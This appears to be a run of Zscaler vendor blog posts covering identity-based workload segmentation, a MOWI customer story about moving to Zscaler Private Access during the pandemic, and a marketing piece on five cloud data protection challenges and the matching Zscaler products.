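The address rule lets the implant through because it only sees an approved subnet talking to an approved port, and it blocks the legitimate app as soon as its IP changes; the identity rule gives the opposite, correct verdict in both cases without anyone editing the policy.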
Piggybacking attacks using approved firewall rules become a thing of the past. Identity is the secret to achieving simpler operations and delivering stronger protection compared to traditional network security controls. Because the identities of communicating software are so specific, Zscaler reduces the number of policies required to protect a segment. As noted above, our platform builds no more than seven policies for each segment that establish exactly which applications and devices can communicate with one another. And because segmentation policies are built using software identity, even if the underlying network changes, policies don’t break. If the system can’t verify the unique identity of what’s trying to communicate, no communication occurs. With Zscaler Workload Segmentation, creating segments and the associated policies takes just seconds with a single click.
Peter Smith is the Zscaler VP of Secure Workload Communication
Nagraj Seshadri

Changing the Mindset: From Cost Center to Business Enabler
Robert Berkenpas is the Group Manager, Infrastructure & Operations at MOWI. His post originally appeared on LinkedIn, and you can view a short video about MOWI’s work-from-anywhere journey here.
It is not unusual that innovation happens when we are faced with a crisis. Dealing with a shortage of resources, lacking time, being faced with an economic downturn or a global health crisis, our plans and budgets, which have been thoroughly calculated, debated, and negotiated, all of a sudden are no longer the rule book by which we play. Unusual times cause us to be quick on our feet, rethink, pivot, and make changes that had been unimaginable before.
Just six months ago, had you told me that MOWI’s offices and production facilities, like the Brugge production plant for example, were going to look like ghost towns, with only essential personnel on the floor that handle and filet freshly caught salmon from Norway (even ramping up production volume) and the factory actually being run from our employees’ homes, I would have called you crazy. Here we are, half a year into the worst pandemic of my lifetime, one that has affected millions of people around the world and brought so many businesses around the globe to a standstill. Being one of the largest seafood producers in the world, MOWI has an obligation to care for our employees and the fish we raise and to secure the supply of food for people all around the world. While it has been a difficult time, I want to highlight a positive development that I have been very lucky to observe over the past few months: IT being recognized as a business enabler rather than a cost center. Earlier this year, when it became evident that COVID-19 was spreading globally and social distancing was going to be essential, my team stepped up and rolled out technology that would enable us to work anywhere and keep our employees, their loved ones, and all our colleagues safe. When people started working from home, it became evident that our incumbent VPN was not able to handle the sheer number of users and amount of data. We had already completed a proof-of-value of Zscaler Private Access (ZPA), which enabled us to fast-track the rollout to all staff in less than a month and proved to us that we had been on the right path when we evaluated ZPA. We deployed the solution remotely and got a few confused looks when we told people to just turn off their VPNs and continue working. Over the next weeks my team received many compliments on the ease of use: no more generating codes and entering PINs as you fire up your VPN, just turning on your laptop and starting to work.
The success we have had with Zscaler didn’t go unnoticed across all areas of the business. This has been one of those rare occasions in my career where we have been able to change the trajectory of our department, even of our business, through this very important technology decision that we made. My team proved that IT is there to support the business, not to put unnecessary obstacles in its way as was often perceived in the past, and, as a bonus, to increase security. We probably pulled off the fastest IT project in the history of the company and demonstrated to our colleagues across the board that we have a vision of how to leverage technology to enable business outcomes. This recognition has already manifested itself in our team being invited to meetings and discussions that we were previously not included in, or being brought to the table at an early stage where our expertise can actually propel projects forward. The mindset has changed and the company is more aware than ever of the value IT brings and how they can leverage our expertise to drive positive business outcomes, not just solve technical problems. We are learning a lot with new technologies, like using AI to improve feed patterns for our fish, or leveraging cloud technology to become a mobile workforce. And this is just the beginning. When we as a business leverage technology to optimize or create new processes, we ensure that our company keeps innovating and supports a sustainable future. I am a firm believer that technology and innovation will create opportunities for MOWI when IT comes in as an innovator and a key partner in the business to make sure we add value at every step of the way.
And I would like to salute and pay respect to my team because they are doing an awesome job; they delivered and exceeded the expectations of the business, and I am really proud of them.
Robert Berkenpas

Five Data Protection Challenges and How to Combat Them
Five challenges
As the modern workforce evolves and continues to trend toward digital business models, company data and applications are migrating to the cloud from on-premises data centers. While this evolution gives individuals and lines of business (LOBs) more control, reduces cost, and enables businesses to run more efficiently than ever before, it also changes the role of IT from local security enforcer to global business enabler, and increases the need for a unified data protection offering to secure data and prevent data loss. Creating a security strategy to support this shift to a new reality of distributed data and cloud adoption across the organization isn’t simple, and businesses will first need to overcome a number of challenges.

Hidden data loss in encrypted traffic – When workers were in-office and on the company network, data and applications resided in central data centers, encrypted traffic was limited, and on-premises solutions were sufficient. With the move to the cloud, encryption has shifted from the exception to the rule. If your data protection solution isn’t classifying and controlling data in encrypted traffic, you will miss the majority of sessions in which data exposure and misuse is a possibility, leaving your organization vulnerable to data loss and breaches.

Gaps between data protection services – With the move to the cloud, data is distributed across SaaS and public cloud applications, and each is often created and maintained by individuals and LOBs across the organization. For example, a cloud access security broker (CASB) service is used to secure SaaS applications, while a secure web gateway (SWG) with data loss prevention (DLP) is used to secure internet applications, and cloud security posture management (CSPM) is used to secure public cloud applications. This complexity makes data protection uniformity and communication challenging, and can cause redundant functions and gaps in visibility and control across applications.

Limited context when controlling data usage – Granular visibility and control are imperative when protecting company data. Most data protection options give IT limited visibility into who is attempting access, the user’s location, and the state of the application, limiting the control needed to enable effective and safe data usage and making data protection decisions unnecessarily difficult.

Poor user experience – With workers and applications moving from on-premises data centers to the cloud, the infrastructure in use is now the internet itself, limiting IT’s ability to anticipate, identify, and mitigate issues. When the majority of apps used by workers are out of the organization’s control, it becomes more difficult to ensure employees have a good user experience and maintain productivity.

Compliance violations across clouds – Failing to meet and maintain required industry regulations can mean hefty fines and even loss of business. With data distributed across cloud applications and services, compliance visibility and remediation ability are reduced, potentially putting your company at risk.
Five ways to combat them
To combat these challenges and make the transition to the cloud as seamless as possible, your data protection solution and protocols should include:

Full SSL inspection of all traffic – Stolen data is often disguised and sent uninspected through SSL, and according to the latest Google Transparency report, 95 percent of traffic is encrypted and therefore not subject to inspection by traditional DLP solutions. Partial inspection of your traffic leaves your business vulnerable to data loss, as sensitive data passing through may be missed. A cloud-based data protection solution can inspect every byte leaving your network, ensuring your data is secure.

Unified protections – Provide a consistent level of security to all your users worldwide, whether onsite or remote, by moving your security to the cloud. Zscaler Cloud Data Protection can monitor data in motion across locations with Cloud DLP and data at rest across SaaS and public cloud applications with out-of-band CASB.

Elastic scale with consistent enforcement – Zscaler prevents sensitive data from leaving your network instead of limiting you to damage control after data has been compromised. With Zscaler Cloud DLP, policy follows users wherever they work—on- or off-network—providing the same level of protection to all users at all times. The Zscaler security cloud scales elastically with performance guaranteed by service-level agreements.

Improved user experience – Many appliance-based security offerings require traffic to be backhauled to a central location, creating bottlenecks and causing latency, which directly affects user experience and productivity. A solution that embraces the concept of Secure Access Service Edge (SASE) puts data security as close as possible to the user, reducing latency and significantly improving user experience.

Compliance reporting and remediation – Enable unified compliance visibility and control company-wide across internet and SaaS applications using 14 different compliance standards, including Cloud Security Alliance (CSA), GxP, Health Insurance Portability and Accountability Act (HIPAA), and General Data Protection Regulation (GDPR), among others.

As data and applications move from the office to the cloud, your company must stay one step ahead to avoid becoming the next victim of data loss. Company and customer data security should be a top priority, backed by a cloud-based data protection solution. To learn more about how to close gaps in your data protection strategy with Zscaler CASB and Cloud DLP, read this white paper or download this eBook.
Steve Grossenbacher is a Director of Product Marketing at Zscaler
Steve Grossenbacher